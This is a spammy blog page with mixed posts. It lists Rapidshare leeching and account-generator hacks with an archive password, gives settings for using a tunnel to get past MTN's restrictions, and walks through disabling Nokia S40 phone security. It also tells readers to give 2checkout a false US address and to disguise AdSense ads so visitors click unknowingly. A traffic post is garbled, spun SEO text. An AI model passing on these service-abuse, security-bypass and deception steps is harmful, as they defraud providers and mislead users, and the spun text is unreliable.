Rapidshare-The Way You Like It
Rapidshare Account Generator
Rapidshare Leeching ******s
Unlimited Rapidshare With IE
Premium Account Checker
Rapidshare Links Decoder
Renew IP - Gigaset SE105
Rapidshare Time Resetter
RapidLeecher v4.5 Beta
Mac Rapid1.6a Beta11
Premium Accounts 115
RapidLeecher v4.4.87
Rapidshare Checker
Briefcase Leecha 1.83
Rapidshare Decoder
USDownloader 1.3.3
Get Rapidshare 6.0
Rapget v0.96 Beta
The Grabber v1.4.1
Link Grabber v3.1.4
MegaLeecher 1.0.4
Rapidget v1.0
RapidUp v1.1



Rapidshare Solution Hack 2008 Edition - Shaify Mehta
Rapidshare Solution Hack 2008 Edition - Shaify Mehta


Password :- phorum.ws

How to write a bio

Posted By Dougyfancy On 10:30 0 comments

A Brief Explanation of An Autoresponder?

Posted By Dougyfancy On 10:26 0 comments
An autoresponder is an automatic email reply. Once you set it up, the reply gets sent when someone sends an email to a specific address or fills out a form on your website.
For example, I could set up an autoresponder called subscribe@mywebsite.com. In the body of the email reply I might have some information about my business and perhaps a discount
coupon encouraging the recipient to sign up for a program.

If someone sent an email to subscribe@mywebsite.com they would instantly receive the autoresponder email reply with the information and discount coupon.
What’s the benefit of using autoresponders?
Using autoresponders saves you time. You don’t have to manually send an email to every person who enquires about your services.

Also, autoresponders are a powerful marketing tool. For one thing, you can collect prospects’ email addresses (the autoresponder asks their permission) for your database. In addition, you can set up multiple or sequential messages to go out to your prospects or clients. In other words, the recipient will receive a continuous flow of email replies spaced out over time at intervals you specify.

What autoresponder service do you recommend?
aweber

There are dozens of autoresponder services on the Internet. Most cost in the neighbourhood of $20 a month. An example of autoresponder is Aweber . It seems to be the one that is most often recommended by people who know about these things.
I have step-by-step instructions on how to set up an autoresponder in Aweber here (coming soon, check back).

Wonder 37 Online Shopping Carts

Posted By Dougyfancy On 08:23 0 comments
1. PayPal
2. Google CheckOut
3. ClickBank
4. Authorize.net
5. MagentoCommerce
6. EventBrite
7. PrestaShop
8. Yahoo Shopping Cart
9. OsCommerce
10. 2checkout.com
11. Zen-cart
12. e-Junkie.com
13. Volusion
14. Virtuemart.net
15. Opencart
16. PayDotCom
17. 1ShoppingCart
18. Bigcommerce
19. Shopify
20. Interspire ShoppingCart
21. X-Cart
22. UberCart
23. DigitalAccessPass.com
24. 3dcart.com
25. Cubecart
26. mivamerchant.com
27. DL Guard
28. WorldPay.com
29. Foxycart
30. Shopsite.com
31. PinnacleCart
32. Kagi
33. Avactis
34. MerchantOS
35. RegSoft.com
36. Premium Web Cart
37. Fantasos

How to Make a Screenshot

Posted By Dougyfancy On 09:53 0 comments
how-to-make-screenshot-small.jpg A “screenshot” is a snapshot of what’s on your computer’s screen. For instance, here is a screenshot of what I see when I go to Google.
You can see that the screenshot includes everything that I normally see on my computer screen, including the titles, menus and stuff at the bottom of the screen.
The reason it looks kind of fuzzy is because I have made the screenshot smaller to fit here. If I had left it the original size it would be just as clear as any page on my computer.
So how do you make screenshots?

You don’t have to buy any special software to make screenshots. Your computer already has the cabability to do it quickly and easily. To create a screenshot follow these steps:

1. Open the page that you want to capture and leave it up on your computer screen.

2. Press the PrintScreen button on your keyboard and let it up. (To find the PrintScreen or PrtScrn button, look on the right hand side of your keyboard).

3. You have now saved an image of your screen on your computer’s clipboard. You won’t be able to see it, but it’s there (it’s a similar idea to when you copy and paste).

4. Open a graphics program such as Paint. Everyone has Paint on their PC. To access it, click Start>Programs>Accessories>Paint.

5. Once you have Paint open, click “new” to create a new empty image.

6. Click Edit>Paste to paste in the screenshot you just took.

7. You will now see your screenshot as a picture. Click File>Save As and save your file in a place that you will remember. If it asks you what format you want to save in, choose PNG.

8. Now you have an image file of the screen saved on your computer. You can insert it into a document or webpage just like any other image.
Additional points:

If you want to skip the Paint steps, you can also paste the screenshot directly into a word processing program such as Word and into certain email programs such as Outlook.

This basic method will result in a full-size screenshot. This follow-up article explains how to make your screenshot smaller. You can also use the same directions to make your screenshot larger.

Your Freedom latest For MTN

Posted By Dougyfancy On 08:27 0 comments
The Your Freedom services makes accessible what is unaccessible to you, and it hides your network address from those who don't need to know. Just download our client application and install or just run it on your PC; it turns your own PC into an uncensored, anonymous web proxy and an uncensored, anonymous SOCKS proxy that your applications can use, and if that's not enough it can even get you connected to the Internet just as if you were using an unrestricted DSL or cable connection -- just like the firewall suddenly went boom! You can even make your PC accessible from the Internet if you like. Nearly all applications work with Your Freedom, and so far no-one has managed to block our service completely and permanently without blocking your Internet access entirely.

Download the latest freedom version here;your freedom. After downloading,install it and configure it as stated below;

Launch your yf,click on configure,
yf address=41.220.77.210
goto settings put :ems01->32.your-freedom.de eg ems06.your-freedom.de.
port:8080
password and username: web
connection mode=http
Tweaks=none
Tick boxes>,3,5,6,
Minimum buffer=1500
Reconnection delay=5000
Initial post size=2000000
minimum post size=1000000
FTP mode=both


Then click on account information and enter your username and password if you don`t have 1,visit your freedom and register...

proxy settings=blank.then click save and exit...

you will be returned back to the front page,click on ports and tick all the boxes therein.save and exit finally...
Relaunch yf,it will connects,and when the door opens,launch your browser and use 127.0.0.1:8080
And you are good 2 go

Using JavaScript instead of target to open new windows

Posted By Dougyfancy On 10:11 0 comments
In my recent post about The target attribute and opening new windows, I stated that when I am faced with no other choice but to open a link in a new window, I prefer using unobtrusive JavaScript instead of the target attribute. The reason is that I always use a strict doctype, which does not allow the target attribute.

What I did not say was exactly how the script I use is constructed, but I guess I should have. A few people commenting on the post thought that I was suggesting the use of JavaScript to insert the invalid target attribute simply to hide it from the W3C Markup Validator. Cheating to pass validation is not what I am proposing.

After a bit of searching I wasn’t able to find a detailed description of this kind of script, so I thought I’d write one. It isn’t a very complicated script, so it’s hardly groundbreaking, but I hope somebody will find it useful.

For the script to work you need to edit your markup just a little, since the script needs to be able to tell which links it should affect. Some use the rel attribute for that, but I prefer using the class attribute since it allows me to style the links that will open a new window. The script looks for links with a class name of non-html, and allows multiple class names.

I think the class name non-html also serves as a good reminder that one of the few times it may be ok to make a link open a new window is when its target is a document in a non-HTML format. Common examples are PDF files and Word documents.

The user should always be warned when links will open new windows, so the script also adds a text with some information about the link’s behaviour. To make it stand out a bit more to people browsing with CSS off and JavaScript on, the text is wrapped in an em element.

Example markup:

The example.com website

Try it out in the JavaScript target demo document.

To use the script, make sure these two functions are included in your common.js or wherever you store your global JavaScript functions:

/*
Create the new window
*/
function openInNewWindow() {
// Change "_blank" to something like "newWindow" to load all links in the same new window
var newWindow = window.open(this.getAttribute('href'), '_blank');
newWindow.focus();
return false;
}
/*
Add the openInNewWindow function to the onclick event of links with a class name of "non-html"
*/
function getNewWindowLinks() {
// Check that the browser is DOM compliant
if (document.getElementById && document.createElement && document.appendChild) {
// Change this to the text you want to use to alert the user that a new window will be opened
var strNewWindowAlert = " (opens in a new window)";
// Find all links
var objWarningText;
var strWarningText;
var link;
var links = document.getElementsByTagName('a');
for (var i = 0; i < links.length; i++) { link = links[i]; // Find all links with a class name of "non-html" if (/\bnon\-html\b/.exec(link.className)) { // Create an em element containing the new window warning text and insert it after the link text objWarningText = document.createElement("em"); strWarningText = document.createTextNode(strNewWindowAlert); objWarningText.appendChild(strWarningText); link.appendChild(objWarningText); link.onclick = openInNewWindow; } } objWarningText = null; } } Thanks to Robert Nyman for looking over the script for me and pointing out a couple of mistakes I’d made.

Either copy and paste from here or download my sample javascript-target.js> file, which contains all the JavaScript you need to use this.

Be aware that if you use XHTML served as application/xhtml+xml, document.createElement() will not work in all browsers. In that case you should take a look at Simon Willison’s createElement() function, described in Javascript, the DOM and application/xhtml.

After that you need to make sure the getNewWindowLinks() function is executed when the document has loaded so it can insert the onclick event handlers. Use your favourite addEvent() function. There are many different addEvent() functions floating around, but the winner of PPK’s addEvent() recoding contest should be a good choice. Once you have an addEvent() function in your JavaScript library, the following will load the getNewWindowLinks() function.

addEvent(window, 'load', getNewWindowLinks);

I suggest putting that line can be at the end of common.js.

So what are the benefits of opening new windows this way?

You can keep the strict doctype, which makes it easier to keep track of any presentational markup that sneaks its way into the markup.
The script is unobtrusive, meaning that for users with no JavaScript support links will open normally (in the same window).
People who use tabbed browsers can still choose to open the link in a new tab.
It doesn’t interfere with extensions like Tab Mix Plus that let Firefox be configured to open links that open new windows in a new tab instead. Update: It apparently does interfere with Tab Mix Plus under certain circumstances. See comment #1 on this page.

Of course this function could be extended to accept a whole lot of parameters like window size and such, but I’ve deliberatly kept it as simple as possible.

And again, don’t forget that opening new windows should generally be avoided.

The Target Attribute And Opening New Window

Posted By Dougyfancy On 09:49 0 comments
Robert Nyman brings up an interesting discussion about opening new windows, specifically by using the target attribute, in How evil is the target attribute?.

The target attribute is not allowed in strict doctypes, and since you should always use a strict doctype, the target attribute is invalid. Period. Unless you use frames, which you should not.

Opening new windows is a nuisance and should be avoided. There are very few cases where a new window is acceptable. If I was forced to open a new window I would definitely use unobtrusive JavaScript instead of invalidating the markup by inserting a target attribute.

My reasoning is that validation is a very useful tool. By deliberately inserting erroneous markup you make that tool harder to use and thus less valuable. Harder to use? Yes, because each time you validate a document you will get validation errors that you need to filter out before you can tell if there are any other, “real” errors.

Most important though: If you, for whatever reason, decide to open a link in a new window, make your users aware of it and if possible give them a choice.

Study Abroad Free In Europe: Sweden,Finland,Norway:Free Tuition For Undergraduates and Postgraduates

Posted By Dougyfancy On 09:42 1 comments
This is like dream come true,just read on...

While going through the pages of one of the local Newspapers here in Nigeria, I saw an advert about studying free in Sweden. I asked myself if this could ever be real and without wasting much time, I hooked to the internet and used my researching tricks to search for info about this. After much clicks I stumbled upon a lot of info which I have decided to share with you,for you to know that IT IS FOR REAL.

For many people who wants to enroll in colleges or universities to further their education, you will agree with me that tuition can be a make or break factor in the final decision. What if there are colleges where you do not have to pay any tuition fee? Well, there are many schools around the world that do just that.

You do not have to pay any tuition to attend tuition-Free schools, though there are still some expenses involved, such as room & board, books, etc. This can be covered in most cases, as many tuition free schools allow students to work while in school.

A lot of tuition free schools are in Europe, where this educational scheme has a long and successful history. As at the time of writing this article, there are many schools in Sweden, Norway, Finland that offer free tuition for undergraduate courses as well as for Masters and Doctorate degrees.
As at the time of writing this article, online registration for Masters Program in Sweden opens around first week of December and closes around second week of January, every year. Your documents must arrive no later than first week of February, Selection results/Notification of admission: Early May and semester starts August or September. You can always get the latest dates from the websites that you will find later in this article. Just relax and read on…

For Nigerians, I learnt that you can use your WAEC/NECO result to apply for undergraduate programs. In this case, it is better to send your scratch card so they can check the results by themselves for verification. For Masters degree, the university where you finished your first degree will have to send your transcripts to the schools you apply to.

In Nigeria right now, there are lots of seminars, adverts here and there by people who do claim to be agents/consultants. Most will promise heaven in getting your hard earned money, all in the name of helping you seek admission into Sweden.PLEASE, BE WISE AND DON’T FALL FOR SCAM EASILY. You can make enquiries by yourself on the websites shared below. Forums like Nairaland are also there to help you out with your enquiries.
If you want to start registration right now for Sweden free tuition schools visit, www.studera.nu
For Finland, visit www.admissions.fi
For Norway, visit http://www.ntnu.no/
For full info about studying in Sweden, visit http://www.studyinsweden.se/Home/FAQ/
http://www.studyinsweden.se/Home/PDF-downloads/ contains some free ebooks on studying in Sweden. You can download those manuals free of charge.
When you get to the sites above, they might not be in English. Just look at the top of the page or somewhere, you should see a link that will take you to the English version of the website
If you want to see what some Nigerians have been saying about this topic on Nairaland, you can visit http://www.nairaland.com/nigeria/topic-26453.0.html . At http://www.nairaland.com/nigeria/topic-359300.0.html some peeps shared their experience and also how you go about the registration ( with pictures).
posted in bright blog.

How To Minimize Application In S40 Phones

Posted By Dougyfancy On 09:24 0 comments
Do you know that you can minimize applicaions in s40 mobile phones like nokia 3110c etc?, is it really possible some will ask? ofcourse it is and very fun to practice. lets begin. firstly,
All you got to do is- edit appropriate line (28 2 or 48 2) at the end of 1st line at last so that there should b 4 lines after editing and if u complete step 1 (upto disabling nokia security) ur phone is hacked nd it vil never ask 4 any permission like allow app to read write data in mmc. Yes no bla bla Applications can be minimized in Nokia S60 versions by pressing the Home Key. But in case of S40 it was impossible but there is [s2]a trick with which you can minimize the Java Applications in Nokia S40 as well.There are Basically some Major (But Easy) steps.
Steps.
1-Download JAF on pc.[check below for the link]
2-Connect your Phone with pc in PC-Suite Mode.
3-Open JAF and go to BB5 Tab.
4-Tick the following.
a-Read pp.
b-Normal Mode.
c-CRT 308(Already Ticked).
5-Now Click Service.
6-Save the *.pp file on Desktop.
7-Open the *.pp file in Notepad.
8-In case the Phone is-
a-Nokia s40 v3 then Search for 28 1 line and change it to 28 2
b-Nokia s40 v5 or v6 then Search for 48 and change it to 48 2
c-In case there is no 48 or 28 then add the Appropriate line i.e 48 2 or 28 2.
9-Save the *.pp
10-Open JAF>BB5 Tab.
11-Tick the following:
a-Upload pp
b-Normal Modec CRT-308 (Already Ticked)
12-Click on Service.
13-Select the *.pp File.
14-After it shows Done, Select Normal Mode from the Drop Down Menu.
15-Phone will Restart and show Test in RNDIS USB mode? Press NO. This popup will be shown on every restart this is normal..
Now we have successfully disabled the Nokia Security wall.
Edit Java Application.
Steps
1-Copy the Java(.jar) application to the computer.
2-Open the *.jar file with WinRAR.
3-Browse to Meta-Inf Folder and Open it.
4-Open the Manifest.MF file in Notepad.
5-At the end of the codes add this line Nokia-MIDlet-no-exit: true
6-Save the notepad file.
7-Click on Yes when WinRAR asks to Update the Archive.
8-Copy the *.jar file to Nokia.
To Minimize the Application Open the application and press the Red button once.To Restore the Application Go to the folder where the application is and then press on the application once. Thats all you need to do,so simple.

download jaf here>rapidshare{jaf}.

download also jaf emulator>jaf emulator.

Shocking Ways To Monitize And Improve Your Adsense Earnings

Posted By Dougyfancy On 04:52 0 comments
Making money using your website doesn`t seem so tough, all you need is knowledge and dedication with continuous practices.
If webmasters want to monetize their websites, the great way to do it is through Adsense. There are lots of webmasters struggling hard to earn some good money a day through their sites. But then some of the ?geniuses? of them are enjoying hundreds of dollars a day from Adsense ads on their websites. What makes these webmasters different from the other kind is that they are different and they think out of the box.

The ones who have been there and done it have quite some useful tips to help those who would want to venture into this field. Some of these tips have boosted quite a lot of earnings in the past and is continuously doing so.

Here are some 5 proven ways on how best to improve your Adsense earnings.

1. Concentrating on one format of Adsense ad. The one format that worked well for the majority is the Large Rectangle (336X280). This same format have the tendency to result in higher CTR, or the click-through rates. Why choose this format out of the many you can use? Basically because the ads will look like normal web links, and people, being used to clicking on them, click these types of links. They may or may not know they are clicking on your Adsense but as long as there are clicks, then it will all be for your advantage.

2. Create a custom palette for your ads. Choose a color that will go well with the background of your site. If your site has a white background, try to use white as the color of your ad border and background. The idea to patterning the colors is to make the Adsense look like it is part of the web pages. Again, This will result to more clicks from people visiting your site.

3. Remove the Adsense from the bottom pages of your site and put them at the top. Do not try to hide your Adsense. Put them in the place where people can see them quickly. You will be amazed how the difference between Adsense locations can make when you see your earnings.

4. Maintain links to relevant websites. If you think some sites are better off than the others, put your ads there and try to maintaining and managing them. If there is already lots of Adsense put into that certain site, put yours on top of all of them. That way visitor will see your ads first upon browsing into that site.

5. Try to automate the insertion of your Adsense code into the webpages using SSI (or server side included). Ask your web administrator if your server supports SSI or not. How do you do it? Just save your Adsense code in a text file, save it as ?adsense text?, and upload it to the root directory of the web server. Then using SSI, call the code on other pages. This tip is a time saver especially for those who are using automatic page generators to generate pages on their website.

These are some of the tips that have worked well for some who want to generate hundreds and even thousands on their websites. It is important to know though that ads are displayed because it fits the interest of the people viewing them. So focusing on a specific topic should be your primary purpose because the displays will be especially targeted on a topic that persons will be viewing already.

Note also that there are many other Adsense sharing the same topic as you. It is best to think of making a good ad that will be somewhat different and unique than the ones already done. Every clickthrough that visitors make is a point for you so make every click count by making your Adsense something that people will definitely click on.

Tips given by those who have boosted their earnings are just guidelines they want to share with others. If they have somehow worked wonders to some, maybe it can work wonders for you too. Try them out into your ads and see the result it will bring.
this doesn`t seem difficult at all especially those that knows what they are doing.
enjoy!.

Information On How To Be Successful At Email Marketing

Posted By Dougyfancy On 21:36 0 comments
How To Be Successful At Email Marketing?In this post we will be discussing basic steps to be successful at email marketing. Obviously there are many different ways to do this but we suggest you to try the following steps below. I am certain that you've heard it a thousand times nevertheless I am going to say it again, the money is in the list. Of course one thing you need to keep in mind is that not all email marketing strategies are useful. Now on the subject of certain types of email marketing programs I know you will realize that safelists and credit based mailers just don't do the job. If you really want to become successful you need your own list of people who want what you are selling. And this is what the particular "Email Your Way To Wealth" system claims to help you with. Without your own personal list there's a great chance that you'll never end up being successful on the web. This really makes a lot of sense, simply because when you have a list of individuals you can email your offers to, and these people are enthusiastic about the types of products your promoting they are a lot more likely to purchase your product. And that's just what this program shows you how to do. They will educate you on how to get your own personal list started and also how to make sure that you are getting individuals to join your list. The first thing you will learn is exactly where you need to be focusing your attention, so your definitely not wasting time. And then in the second step you will learn how you can keep your communication open along with your customers 24 hours a day. And one of the most crucial steps is getting individuals to view you as an expert in your field and you will learn how to do that in step three. Getting fresh individuals in your list is essential and you will learn how to do that in step four. How to properly use affiliate programs for your list is just what you are going to find out in step 5. You will even learn other methods for you to make money and monetize your messages in step 6. You will also discover that there are 3 extra steps that are not shared with anyone until they sign up for this system. Additionally, you will be given a few bonuses when you sign up for this program. The first bonus is "Passive Income Through Email", this shows you how to generate thousands of dollars every month automatically. The 2nd bonus will be "20 Million Dollar Subject Lines" this needless to say shows you how to get your emails open. And a few even more well known and helpful bonuses are interviews which have been done with Steven Pierce, Eben Pagan and even Yanik Silver. This really is an extensive email marketing system that just about anybody can benefit from. You will also discover that they're not really trying to rake you over the coals since they're offering this program for just $37. And also to top the whole thing off you will also get their 100% cash back guarantee. This will allow you to try this system for a full TWO months and if you decide this system is just not for you, you get your money back. By now you should be able to set up your very first email marketing campaign. Once again, email marketing is all about testing, in other words try to make small changes in order to develop your perfect email marketing strategy. If you have enjoyed reading our email marketing advices, feel free to like this blog post

A Strategic Way To Maximize and Maintain Earnings with Your Blog

Posted By Dougyfancy On 21:29 0 comments
A Strategic Way To Maximize and Maintain Earnings with Your Blog. You will discover a lot of good reasons why people take advantage of blogs for an income generating site. That almost always is an excellent choice for anybody as long as you learn the right things that can certainly make a difference. There exists quite a bit that goes into creating a blog that succeeds with generating some kind of money. So certainly unless you know what you are doing, then you definitely are in for a hard and frustrating experience. Just about every little thing you get wrong will make its own unique contribution to your lack of positive results. We will mention some of the more widespread mistakes we see with business blogs. There is always one thing in particular I have discovered on very many blogs. I arrive on a blog, and there are so many ads and active components that the page really is slow to load. The website owner has a tendency to think having a lot of ads is sure to get someone to click and buy. Whenever I see something that is bothersome or annoying, chances are pretty strong that others will feel the same way. Probably other people will not prefer that either, and so the alternative is simple. Test ads and discover what converts the best, after which have a minimal amount of ads on your blog. You can do significantly better with sales if you only use a negligible number that convert well. Here are just some items you have to keep in mind for SEO. Google is putting great focus on solid content that people stay on a site for and read. If you understand your market, then you will understand what is important to them. Secondly, you will have to write your content with optimization in mind. There is plenty of written content that is definitely written for search engines instead of the reader. Obviously you need to be very sure that you stay on the topic of your keywords and site topic. A lot of people may not believe this, but if you merely write for the viewers and your topic, then you will effortlessly optimize for Google. We still find it fairly common to make certain strategic mistakes with driving traffic. First, it really is true that you can find plenty of diverse traffic solutions. That means opportunity, but a of individuals use the incorrect approach which we will explain. The most secure and most worthwhile way to use all those methods is to make one method happen before shifting to the next. You can have traffic insurance if you have multiple methods in position, and each is working for you. So that means employing videos, optimizing for search engines, high quality article marketing and other types of advertising. The online business landscape can shift without a moments notice. That is why marketing and advertising diversity could be the key to keep your business alive and healthy. You could lose one or perhaps two types of traffic, and two is unlikely, and you can still survive and locate another method.
Share and Enjoy

Make Good Money Blogging

Posted By Dougyfancy On 21:19 0 comments
make money blogging How To Make Money Online With Your Own Blog There are numerous ways for individuals to begin making money online today and among those ways is with a free blog. However, not any kind of platform will work when your looking to earn money off a blog. I tried to do this once using a WordPress blog only to discover that they don't like that and they shut me down. Additionally, you will find that they do not let people put their Google Adsense codes on their blogs. The blogger. com platform will allow for Adsense and they have no issue with you advertising affiliate programs. And so for those of you aiming to start a free blog and also earn money you should have a look at blogger.

Blogger furthermore allows you to choose your style for your blog. Even though the amount of themes you are able to choose is not as massive as wordpress they still have different choices. Also you can alter the colors of the blog in case your unhappy with the default colors. And so for those of you who would like to make sure your blog is unique, it is possible to do that within the setting. This really is just one of the truly amazing features you will find with a blogger account.

Additionally adding your Adsense codes is really simple and can be done with just a click of your mouse. With one click of your mouse button you can add multiple Adsense blocks that actually match the colors of your blog. What this means is no more going to Google to try to set up your adsense codes and getting all of them to match your site. Your site can also be updated to new colors easily and also update the actual colors of your adsense codes.

The best portion is you may use the. add a gadget section to add affiliate banners or perhaps links. This is a 2nd method that you'll be able to earn money from your no cost blog. As most people will tell you, affiliate programs are really a great way to make some good money on the web. The best thing about having 2 programs making you money is that you will end up earning more money. Clickbank is a great choice for your affiliate programs, but you can actually use any program you want.

The fact that Google is the owner of blogger. com is in reality a good thing. The reason this is such a good thing is that your website can end up getting indexed very quickly. This will assist you to start getting traffic quickly. So when you think about it, getting traffic quickly also means earning money more quickly, which is really what everybody wants.

And so at this point you see that you can make money online with a no cost blog site. The truth is by using the services of a zero cost blogging account such as blogger you won't even have to spend money on your own domain or web hosting account. And so a free blog is a terrific way to make money, particularly if you have no money to get started.

That's it for today, if you've learned something from my blog post feel free to press the +1 button haha!

Information On How To Get A Free USA MasterCard From 2checkout

Posted By Dougyfancy On 21:09 0 comments

Now before you sign up for a Payoneer Mastercard, you should check carefully which of the partner network you’re likely to earn money from. There’s no point signing up with a network you know you can’t promote in order to make money from. The reason is, your card will be unusable till you’ve received at least one payment from that network.

What I’m saying is you can’t load or use your Payoneer Mastercard to buy anything online till you have received a payment from the network you signed up with. And Payoneer gives you just 6 months of inactivity, and your card gets closed. That’s pretty long to me, I mean what are you doing with a card for six months without using it?

So you should consider seriously if you really need a Payoneer Mastercard or not. I know of people who just want one cause they just want to have it.

If you’re ready to promote 2checkout’s affiliate products, then here’s how to get a free Payoneer Mastercard from their affiliate program:

Requirements:

1. A website or a Blog. You can get a free blog at Blogspot.com

2. A drivers’ license or your National ID card or your International passport. I prefer the driver’s license option.

3. A US address. (2checkout accepts standard Nigerian vendors, but not Nigerian affiliates. I spoke with them on this, and it’s the usual response of too many Nigerians taking advantage of their system and doing all sorts of dubious things. Seriously, this has really got to stop.)

4. The readiness to promote their products honestly and earnestly. You have all the advantages, unique products with few or no competitions, unlike Clickbank where every Dick and Tom is trying to promote.

Sign up For an Affiliate Account With 2checkout

1. Sign up here:
https://www.2checkout.com/va/signup

2. After successful sign up, log on to your account and click on the “Bank Account“ tab.

3. Click on the “Payoneer” link, follow the instructions to set up your card.

4. Always check the email you signed up with, in case they need any info from you.

Note: Use your US address when setting up your affiliate account with 2checkout, and then use your Nigerian address when setting up your Payoneer Mastercard in order to get the card delivered to your Nigerian address. But if you can get your card with your US address, then by all means use it on both sign up pages.

It takes up to 30 to 40 days for your card to arrive. While you’re waiting, log on to your affiliate account and look for products to promote.

The easiest way to make sales is to get a free blog at blogger.com with the name of the product you’ve picked. Write good articles or reviews about the product, stick it to your blog with your affiliate links plastered all over the place, of course do this with absolute discretion. If you’re already an experienced affiliate marketer, then you already know how to do your thing.

Then sign up for an account at
https://www.2checkout.com/va/signupEzineArticles.com, write and submit original articles or pay someone to do it for you. This has always proven to work, so don’t be lazy get off your butt and get to work.

How To Get The Best Traffic Of Your Life

Posted By Dougyfancy On 16:12 0 comments
Website traffic is monitored through various tools. Many of the best tools are free, but the results may need some interpretation. There are many companies that provide services that monitor and analyze website traffic. There are also ways for website owners to learn to perform this service themselves.

It may take a while to learn, but it is a worthy investment, especially if a website owner is serious about growing the traffic to his or her site. There are many reasons to analyze website traffic. One of the biggest reasons is that it gives site owners a way to monitor the effectiveness of their site. If, for example, a website is registering 3,000 hits during a two-day span, it sounds like the website is doing reasonably well.

On closer examination, however, the owner sees that the visitors are only staying a minute, and are not looking at the other content on the site. Now, the owner can try to solve the problem, and find ways to encourage the visitors to stay longer. Increasing website traffic takes time, luck, and skill. For any one topic, there may be a million or more web pages devoted to it. In order to get traffic to one particular site, the owner needs to know how to get his or her content noticed.

Website traffic is no different, you must continue to offer some great giveaways and more information for your visitors. This will make it easier for contacting them and telling them about more of your special offers. As you see, the sources for free web traffic are many and they can become valid contributions to your online business prosperity, if you are willing to pay the price of work, time and dedication.

Website traffic is by using a traffic exchange. Submit it to a few article directories, and you’ll get some readers. If they like it, some will even take it and use it on their websites, creating valuable one-way links. Meanwhile, some readers will like it enough to want more, and they’ll click that link in your resource or “about the author” box at the end of the article.

Website traffic is to register your website with the major search engines. But all your efforts can go in vain if the content of your website is not fully optimized. We provide you customized seo services which are highly key word oriented suiting your needs and requirements. We focus on increasing the amount, quality, and relevance of your website content, and on increasing the popularity of your site by having other sites link to your site.

The more people “in the market” that your message reaches,. So how do you ensure that hundreds, thousands or even tens of thousands of your potential customers come to your website? Website traffic is to use pay-per-click (ppc) services such as google adwords, or yahoo or a host of other pay services. You also need to know what you’re doing or you could find yourself spending lots of money, getting poor results and losing money very quickly.

Also, when you’re first starting out, you have a limited budget, and starting with ppc campaigns may not even be an option for you at this point in time. Free traffic exchanges can be a great way to get traffic to your website. You should also know there’s really no such thing as free because you must spend your time surfing through other websites to earn credits.

Free traffic exchanges are a great way to get lots of visitors to your site however, so spending an hour a day surfing, is not a lot to ask if you’re making sales from your efforts. And isn’t this why your in this business to begin with? Free traffic exchanges are a great marketing tool for a many reasons. The best reason is that you get lots of people looking, and hopefully clicking on your website or promotional pages.

But there are hidden benefits to free traffic exchanges you may not have even considered. Search engines love free traffic exchanges because of all the incoming and outgoing links they generate. Plus the rapidly changing content is another reason the search engines love traffic exchanges. Exchanges that have more content also generate a higher page rank, and therefore more traffic, and increased memberships.

Website traffic is one thing, but targeted traffic is everything. You have no doubt seen dozens of offers similar to 10,000 hits. Is completely untargeted and will undoubtedly result in a very. The illusion of progress, but you will achieve better results. With a lower volume of highly targeted traffic. I speak from experience because in the early days of developing. My home business, i went for the big numbers instead of focusing.

Website traffic is actually very easy, and in some ways it is easier than buying the traffic for a website. The primary way that people obtain information about a website is through search engines, so it is a good idea to optimize a website for search engines. This is done through a process known as, you guessed it, search engine optimization. Search engine optimization is a process that optimizes web pages to allow them to show up at the top of the first page of popular search engines, such as google or yahoo. Most individuals pay for search engine optimization. But what they don’t know is that they can do it themselves for a small investment.

You want the kind of visitor that gladly opts-in to your newsletter and practically begs to buy what you have to sell. In pursuit of this, i have purchased, studied, and tested many courses on the subjects of. Website traffic is to ask a “how to” question and write about your solution. If you’ve got a motor-related site, writing an article on “how to sell a car” could be an excellent idea. In the landscaping business? “How to plant a tree?” would make for a good article too. What could you write if you have a conference facility? How about “what to remember when arranging a wedding or business function?”?.

Not only will writing articles bulk up your website’s content, which search engines love, but will also add value to other websites that publish your writing on their websites. The good thing about good articles is that they tend to circulate the net pretty well. By adding an optimised link to the bottom of your article you could in turn generate more traffic to your site. But articles aren’t the only way of generating traffic to your site. Something that is destined to become more popular is the inclusion of a business blog on a website. This lets you build a personal relationship with your customers. Naturally, the blog needs to be well thought of before being added.

Will it be a regularly updated blog or one that is updated less frequently? Will there be one or more voices/writers for the blog? Everyone has their own preference to a style of writing. Letting your staff or departments publish their own blogs will create even more opportunities of attracting more than one type of reader or client. Adding a tool that people are searching for is yet another excellent idea. It could be a currency converter, bmi calculator or a free online travel organiser – anything that is related to your website and that offers an invaluable benefit to those who find it.

Website traffic is always an advantage so the effort should not stop, even if the alexa ranking seems satisfactory versus the competition. However this approximate analysis will give a good indication of whether the website traffic problem is one of extreme urgency that needs to be handled as a priority. Do what is necessary to grow your website traffic. So you’re now understanding how many visitors you have to your website. One important thing to realize is that as mentioned above, this count includes spider visits as well. This may be a significant part of the total traffic.

What are the steps to be taken to increase that visitor traffic to the website?. Website traffic that is looking for you is the best. Most people will instinctively think about search engine rankings for keywords as a way to boost website traffic. However if a website has been constructed to be informative for human website visitors, then an important slice of the effort needed has already been invested. To go into details on what is needed beyond that would go outside the scope of this newsletter. However the web page showing the search engine optimization (seo) key provides a short checklist on what is involved.

Website traffic is the holy grail of website promotion and the experts at keniston & company develop search engine marketing campaigns transforming your website into a virtual sales force.

Website traffic is the life blood of any online business. We will profile and deliver an internet user to your website at the exact moment they are search and surfing for a product or service that you sell. We are one of the most efficient and profitable sources for advertising and marketing your business around the corner.

It requires strategic planning and implementation of your content into websites, blogs and search engines.
Website traffic is a key step in the process and one that is often overlooked. A recent headline in the harvard business review read,”if you’re not measuring marketing, you’re not marketing.” Understanding where your website traffic is coming from and measuring your return on investment is just as critical to help you make future marketing decisions. Here are a few questions to consider when executing your end-of-year fundraising plan and setting goals for 2009:.

What are some tips for nonprofits to drive more web traffic and what techniques seem to work better than others? How can you better optimize your site for conversion and what can you do to measure return on investment? While email marketing programs remain an effective way to drive constituents to your website, more and more organizations are leveraging social media to increase traffic and brand awareness. A vague term, social media can mean anything from blogs to social networking websites and bookmark sharing services.

Don’t be afraid to start small with one set of applications before trying something else. There are a lot of high-impact, low-cost things you can do to get started. Social bookmarking websites are a great place to begin. Website traffic is the single, number one issue among new webmasters. When your website is constantly turning up ghost town statistics, it seems like there’s no way out. Pair that with the reality that visitors, who have made it to your website, may never return and you’ve got instant “all-hope-is-lost” soup.

What you can do to capitalize on those who were fortunate enough to land on your site, is create an email subscriber list - but don’t stop there, offer an irresistible incentive that will make it impossible to ignore your offer. Soon you’ll see your subscriber numbers climbing. But now what do you do? You take those subscribers and you send emails that offer them more irresistible incentives to return to your site. Offer them free strategies, ebooks, tips, anything to get them back to your site. Then offer them more bonuses for referring others to your site. Soon you’ll have more return visitors and then some.

